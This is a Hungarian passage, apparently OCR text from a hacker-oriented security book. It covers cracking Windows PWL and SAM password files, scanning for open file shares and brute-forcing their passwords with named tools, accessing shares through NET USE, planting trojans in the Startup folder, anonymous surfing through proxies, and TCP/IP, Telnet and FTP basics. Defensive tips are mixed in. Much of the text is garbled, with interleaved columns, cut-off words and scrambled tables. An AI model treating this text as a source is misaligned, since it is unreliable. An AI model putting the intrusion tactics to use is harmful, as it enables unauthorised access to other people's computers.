tartalmaz egy saját PWL fájt. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel . (dpa) Forrás: www. A PWL a PassWord Library rövidítése. 2. hogy adatokat tudjon elhelyezni bennük. verziótól kezdve egy automatikus kiegészítést használ.internetet vagy a hálózatot.. Egy kb. A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek.de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni. a felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését. november 5. hogy valaki. A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat.

amely megakadályozza a jelszavak kiolvasását. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. a frissítés egy erősebb kódoló algoritmusra. mindez azonban már sokkal több időbe telt. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. A feladó egy kulccsal kódolja az átvitelre szánt adatokat. amelyek a tulajdonképpeni jelszavakat tartalmazzák. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. továbbá úgynevezett rekordokat is tárol. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat.asp oldalon juthatunk hozzá. A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége.A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. főleg a Windows 95 felhasználóknak. A PassSecure a Multimedia Network Systemstől meggátolja. Mindegy. Ezt a fájlt nem lehet közvetlenül elérni. Ha Windows 2000 alatt bejelentkezik egy felhasználó. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol. Jelszófeltörők Mint már említettük.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. A következő verziókban már olyan kódolási technikákat használtak.csak ellenkező irányban. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Ez a kulcs megakadályozza a megadott jelszavak tárolását. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását. amelyeket a winnt/ system32/config/sam fájl tárol. 2. és hogy melyik felhasználói csoporthoz tartozik. A Windows 2000 ellenőrzi minden jelszó hosszát. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. Egy PWL fájl tartalmaz egy header-t. amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. az adatai a Security Account Manager-hez továbbítódnak. ez az adatbázis a Registry része. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. valamint a fájl létrejöttének a dátumát. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják . ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. és ezzel lehetetlenné teszi a kiolvasásukat is. fájloknál azonban sok idő kell a jelszavak kiolvasásához. és az. s egyfajta „jogosultsági igazolványt" kap. amelyeket egy másik számítógépre másolhatnak. amelyben rögzítve vannak a hozzáférési jogai. A SAM azokat a felhasználói adatokat használja.com/support/kb/artícles/Q132/8/07. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál.2. Ez a Windows jelszó mellett a hálózati jelszót is őrzi. a Windowshoz sok jelszófeltörő van. illetve feltörését. Ehhez az update-hez a http://support. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. mivel a Windows állandóan használja. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. hogy az eljárást könnyű implementálni. a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. hogy a jelszófeltörők elérjék a PWL fájlokat. amelyek lehetővé teszik a Windows jelszavak kikódolását. hogy a jelszó hosszabb vagy rövidebb 32 bitnél. Továbbra is ajánlatos azonban. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. Van egy program is. amelynél mindkét kommunikációs partner ugyanazt teszi . illetve kiolvasását. Az RC4 egy szimmetrikus kódolási eljárás. mint a Windows 95/98/ME alatt. microsoft. és szükség esetén figyelmezteti a felhasználót. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. a kód mindig ilyen hosszú.

Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. például a rendszer hálózatra csatlakoztatása miatt.5.) Itt egy kockázati tényező rejtőzik. hogy továbbra is használni tudja a régi PC-jét.és nyomtatómegosztás veszélyes biztonsági rések A fájl.internetvagy hálózati felhasználók. fejezet részletesen újratárgyalja. amelyeknek a felhasználói minden meghajtót megosztottak. amelynél gyakran használt jelszavak és karakterek listáját használja. főleg attól függ.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni. A kár. A második a brute force cracking. elég idejük van a hackereknek arra. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését. Ez a program úgy kerüli ki a hozzáférési védelmet. Az egyik legismertebb közülük a legendás LOphtCrack 2. Azonban a strandard konfigurációt gyakran meg kell változtatni. ugyanakkor újra bebizonyítják. Az első módszer a dictionary cracking.3 A távoli elérésű támadás . hogy mennyire könnyelműen mozognak egyesek a hálón. hogy a háttérben egyfajta másolatot készít a SAM-fájlról. Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát. Ráadásul az ISDN. hogy a cél érdekében számtalan támadási módot kipróbáljanak.és nyomtatómegosztást tulajdonképpen arra használják. az xDSL és a flatrate-ek korában. méghozzá minden jelszóvédelem nélkül. amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez. így például a rendszer különböző réseinek a szkennelését. valóban nehéz.1 A fájl. LOphtCrack 2. hogyan lehet felderíteni az ilyen megosztott erőforrásokat. amelyet a hackerek okoznak. egyedüli PC-ként és trójai nélkül. 2. hogy kitalálja a jelszót.Időközben azonban számos Brute Force program is íródott. zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt. amelyet nem veszünk észre 2. ahol minden lehetséges szám és/vagy szókombinációt kipróbál.5 . hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. vagy hogy időnként csatlakoztatni tudjon egy notebookot. (A jelszófeltörés témáját a 7. hogy milyen megosztásokat használ a felhasználó. . a megosztás a magánemberek számára is a biztonságot meghatározó témává vált. szabvány konfigurációban. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton. Ebből a fejezetből kiderül. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket.3.

és nem mindig találja meg azonnal a megosztott erőforrásokat. ami több szkennelést tesz szükségessé. Kapcsolódás egy másik számítógéphez. a hálózaton keresztül elért számítógépen.59.hackerzbook. hogy a jelszófeltöréshez egy másik eszközt. UNIX/Linux Windows 9x/NT.hackerzbook. Sajnos. és semmilyen támadóeszköze nincs. Az egyik legismertebb ilyen a Légion. .de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000. fájlmegosztással Egy másik a Lan Guard Network Scanner.de www. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik. majd grafikusan megjeleníti ezeket. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés. a Légion nagyon megbízhatatlan.de www. ami azt jelenti.2. például \\217.de www. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www.2 Mik azok a szkennerek.3.3. például a Légiont kell használni.hackerzbook. a Rhino9 szerzeménye. A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat. Nem nehéz felismerni a lehetséges kockázatokat és károkat.hackerzbook. A Légion minden megosztást szkennel a számítógépen. A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni.161.

vezetékneveket. admin. Az is köztudott. Egy példa arra. a fájl törlődjön. 2. barátnő.3. hogy a felhasználót személyesen is ismeri. vagy a kedve szerint törölhet. jelszó. administrator. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön. De vannak gyakran használt szabvány jelszavak is.3. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. mint például gast. hogy végiggondolja a felhasználó minden ismert személyes adatát. gyakran hebehurgyán felhasznált jelszó közül. az bizony kérdéses. pl. Ilyen lehet például egy program. hónapnevek vagy teszt. amit egy hacker programok segítsége nélkül is megtenne. és a szerver elinduljon. ahol megvan a lehetősége. Annak megfelelően. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány.5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. törölni. amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. a betolakodó másolhat. kutya nevét. boss. és ezeket jelszóként végigpróbálgatja. ami a helyi hálózaton.. feltölthet. ahogy neki tetszik. Ezt a beavatkozást esetleg észreveszik.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2. Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki.. hogy mi mindent tudnak megváltoztatni. amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. Az első. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. keresztneveket. Kezdhetné azzal. Ezzel megvalósíthatjuk. amit valamikor a potenciális hacker is fel fog adni.3. hogy csak néhányat említsünk a számtalan. hogy milyen hozzáférési módokat adtak meg.Így lehet DOS alól elérni a másik számítógépet 2. rendkívül hatékony is lehet. Ezzel elérhető. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. születési adatokat. ha kap egy hibajelzést. a szisztematikus találgatás. és több sikerrel kecsegtető módszerek után néz. . Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás.

amelyeket most csak bemutatunk. Ez ugyan nem kínál százszázalékos védelmet.3. illetve a Remote Controll programok. sok különleges karakter hiányzik. ismertebb nevükön a trójaiak segítségével. itt semmiféle háttértudás megszerzésével nem kell foglalkozni. Aránylag kényelmetlen. természetesen vannak még más támadási lehetőségek is. illetve töröljenek. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra. Egyre jobban elterjednek a trójai-. 2. A PQwak l . A PQwak minden karaktert és különleges karaktert felismer.megszüntetjük a megosztásokat Trójaiak . Ezeknek a programoknak a problematikája az egyszerűségükben rejlik. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről. és aki sikert akar elérni.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. és kiindulhatunk abból. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra. amelynek a jelszavait fel kell törnie. fejezet).0-s verziója nincs túl gondosan programozva. hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét. amelyek védik az erőforrásokat. manipulálják a Registry-t. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét.4 További támadási technikák A bemutatott biztonsági réseken kívül. és megosztásokat hozzanak létre. A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott. és egyre gyakrabban figyelnek oda arra. de veszélytelen . köztük a NetBIOS-t is távolítsuk el. 2. illetve víruskere- .és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. hogy jelszavakat kémleljenek ki.6 Óvintézkedések A legegyszerűbb. annak gyakran kell újraindítania. eljárásokat indítsanak vagy fejezzenek be. amelyek külön fejezetet kaptak a könyvben (lásd 4. Tulajdonképpen csak erős jelszavak jöhetnek számításba. amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez. mivel rá vannak utalva a megosztott erőforrások használatára. hogy a bonyolult támadásokkal ellentétben. hogy teljesen az uralmuk alá hajtsanak rendszereket. amit tehetünk. és amelyekre most csak röviden szeretnénk kitérni. ami azt jelenti. ha védekezni akarunk az ilyen támadások ellen: a fájl. adatokat másoljanak. amelyek az operációs rendszer felépítésében gyökereznek.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet. de jelentősen megnehezíti a betörést. Továbbá minden szükségtelen protokollt. Mind gyakrabban használnak tűzfalakat. és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja.

Ez a magatartás durván felelőtlen. mikor már régóta ismert trójaiak. A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. . amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben. de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni. De még mindig elég sok felhasználó van. amelyek vállalati hálózatokban működtek. akikben nem tudatosultak ezek a veszélyek. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre.ső programok is. és fütyülve minden figyelmeztetésre. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket. ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. A gyakorlatból ismerünk olyan eseteket.

1 A legtöbb felhasználó sokat elárul3.......4 A portokról ......3............2 Az FTP 3. A TCP/IP 3.1..... 3......... fejezet .1 Mi a TCP/IP? 3. Az IRC 3.1 Az anonim internetezés csökkenti a kockázatot ..3 Néhány alkalmazás és protokoll használata és a biztonságosságuk .1...4 Az IP-címzés 3...2..... Névtelenül 3......2 ....2... 3...3...3..Tartalom 3....1 A Telnet 3...2 Különböző protokollok a rétegekben 3.3...3..2.3.....

kockázattá. a m IRC. az időpontot. suk a legfontosabbakat a névtelen szörfözésről . és a nézőnek egyáltalán nem tűnik fel. GIF-ekről. amelyek lehetővé tesznek bizonyos tákat. hogy kiderítse a lakásunk.tudnia kell a pontos címet. szörfözés célja. Mindkettő hasonlít a talán már ismert cookie-khoz.mert egy hacker nem jeC-nk szempontjából . amelyek alapján hackerek figyelhetnek fel ránk. Az IP-cim minden alkalommal átmegy az adatokkal együtt. egy emelettel és lakásszámmal együtt tacímhez hasonlít. a b valamint egy korábban elhelyezett cookie információit. ha „normál" mó- Egy szituáció. a ek URL-jét. Ez den bemutatja a legfontosabb információkat. Csak ennek az adatnak az ismeretében válik a aablak . és esetleg károkat nekünk. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. Mindenhol h nyomokat. A parányi GIF-képecske (egy pixel méretű).1. A „normál" és az anonim szörfözés közötti kü http://privacy. amikor a web-bugot megnézték. Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg. és ez gük lesz pontosan kideríteni az identitásunkat. amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat.1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. amely valahol a webo tegrálva. hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek . amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak. Így viszont sok emenően érthetetlen marad.ok don szörfözünk a neten. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. de amint ez ismertté válik. amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével. és gyakorlatilag úgy működik. mivel egészen k átadja egy szervernek az IP-címet. és kikapcsolni sem lehet Tehát a legfontosabb.a PC-nk nyitott portjához hasonlóan . igen jó rálátás kíetkörülményeinkre és a szokásainkra. Így némi erhető a technikákba is. nagyon pontos címzés. . A kis web-bugokról van szó. amit az anonim szörfözésnél el kell titk tuális IP-cím. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. arról természetesen szintén itt olvas 3.net/anonymizer oldal teszi világossá. Ha egy o tartalmaz ilyen „bogárkát". Csak ezután á. min csak ebből semmit nem lehet észrevenni. stratégiáiról és őségeiről. személyes adatokat adunk meg. illetve a házunk gyenge pontjait. a felkeresett oldal URL-jét. akkor ID-vel együtt lehet tárolni. E mmi sem történhet. ICQ vendégkönyvekben és a nyílt fórumokon.hiszen a névjegym osztogatjuk mindenütt. Ezzel akkor kell foglalkozdünk a háló kémlelésének.

(ezek egy táblát akasztanak ránk. a kliens és a hos vannak kapcsolva. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez. és nem a din IP-t mutatják. mint minden más.cgi. hogy: „Megint itt vagyok!") az interneten. Így például le tudja nyomni a weboldalakon található . mint a JavaScript és hasonlók). és az ott tartózkodás ideje. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. Hogy hetséges. néhány ezek közül: ez tartozó domain név. Azon tőség is van arra. Tehát a proxy képviseli a számítógépünket. gésző az e-mail-címeket és/vagy a login neveket is továbbítja. hogy titkosítsuk a saját IP-címünket. és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus.12 i686) a Netscape-hez (angol verzió). fent nevezett információt. csak annak a weboldalak az információi kerülnek ki.de vagy a klassziku anonymizer. vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. amelyről erre az oldalra mentünk. az Anon használata.Információk az Anonymizernél Úgy az IP. Hogy mo konfiguráljuk a böngészőnket. a ho „hiszi" (az IP alapján). amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb. idítés a használt webböngészőhöz. és a hostnak a proxy IP-t. l URL-je. hogy védekezzünk. A kliens tehát össze van kötve a hosttal. itt például Linux 2. hogy a következő adatok mindegyike. mint a teljes útvonal is felismerhető. egy mási milyet se mutassunk.12-t egy Intel PC-n. csak a szerver címét és a por gésző Internet-beállításainál (legjobb.com/lists/proxy/ címen találunk listát.2.7 [en] (X11. hogy milyen operációs rendszer melyik verzióját uk. azt mindjárt kiderül. Vanna keresőgépek is és hasonlók. például Mozilla/4. 2. vagy talmakon keresztül. Íme. Az IP-cím és az útvonal mellett előfordulhat.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek.junkbister. például a http://anonsurf.de természetesen újból olvasni.2. hardverként vagy szoftverként.1. másik IP-t oszt ki . tehát a szolg újabb betárcsázáskor egy új. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor. Ehhez egy kis m proxyk.net címről. ahogy az előbb már említettük.2 Névtelenül A cél tehát az. 3. hogy csak (!) a proxy-szerverrel van ben.com. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy. Ebből a rövidítésből g az is kiderül. mert egyéni igények szer ható. Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. Mostanában a Junkb jött divatba (közelebbi információk a www. amelyet a számítógép egy oldalhoz választott.

ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. Alapértelmezésként ez st kap. feljegyzi egy listára. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. Mindez a ra védelmét szolgálja. n nem működik hibátlanul. Hogy meghat mációkhoz juthassunk. a valóban a sző által elküldött sztringeket küldi el. user agentként. Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. ő eszköz. E letilthatjuk a frame-ek vagy a képek letöltését. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben. állomásból áll. A JavaScript utólag mégis áthúzhatja a kat. Minden Mix gyűjti a bejövő üzeneteket. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. ezt azonban lekapcsol Webwasher magáncélra ingyenes. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket. majd az emre váltáskor kérésre automatikusan betölti.i eszköz a jelenleg csak kevesek számára elérhető Mix-System. Létezik ugyan egy verziója Windows 95-höz is. és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. Az oldalakat. amelyet minden esetben ki kell y át kell engedni. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése. inkább kapcso • Ha egy hacker valami nagyobbat tervez. A programot szőből lehet kezelni. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. A kommunikáció a Mixen belül kódolt. A WWWoffle Unix/Linux rendszerek s NT alatt fut. beleértve az online és az offline módok tást is. szét és egy bizonyos idő után továbbküldi. vagyis a anonim marad. amiről sen megfeledkeznek. akkor beszerez mag shell-accountot. A Webwasher.de címen. amelyekre rá de még nincsenek a cache-ben. azonban más háló sokra is átvihető. amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek. s ezekről üzeneteket küldenek. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre. az animált képeket és a pop-up menüket. hogy a Webwashert használja. Az eg tő veszély itt is az. Ez a proxy elsősorban cache-elő verként működik. amely az anonimitásról gondoskodhat. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. itt is célzottan lehet definiá headert. amelyről az oldalra kattintottak. vagy kiköthe volítsa el a HTML-kódból a Java. megadhatunk egy URL-listát. a Webwasher. Tehát: ha nincs rá feltétlenül szükségünk. latnál fog betölteni és hasonlókat. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. ilyenkor po adhatjuk. Pontosan megadhatjuk. Ez a technológia először Internet Explorer 4. amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). A cachen különböző kritériumok szerint közlekedhetünk. A Mix hátránya. hogy kiszűrje a weboldalakról a nereket. a program lehet érdekes. és így sem lehet. A koncepciót um eredetileg e-mail küldéshez fejlesztette. hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. az egész rendszer megbízható. hogy mi kerüljön a cache-be. • A proxy-knál még egy fontos szempontra kell ügyelni. kilistáztatául az összes. azé az URL-é. Termés konfigurálható. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt. Még ha valóban anonim proxykat is használunk. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. és lehetővé teszi. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel.0-s verzióban jelent meg.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. Ha csak egyeden gbízhatóan működik. csak egyes teket lehet találni.webwasher. és megtalálható a w.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

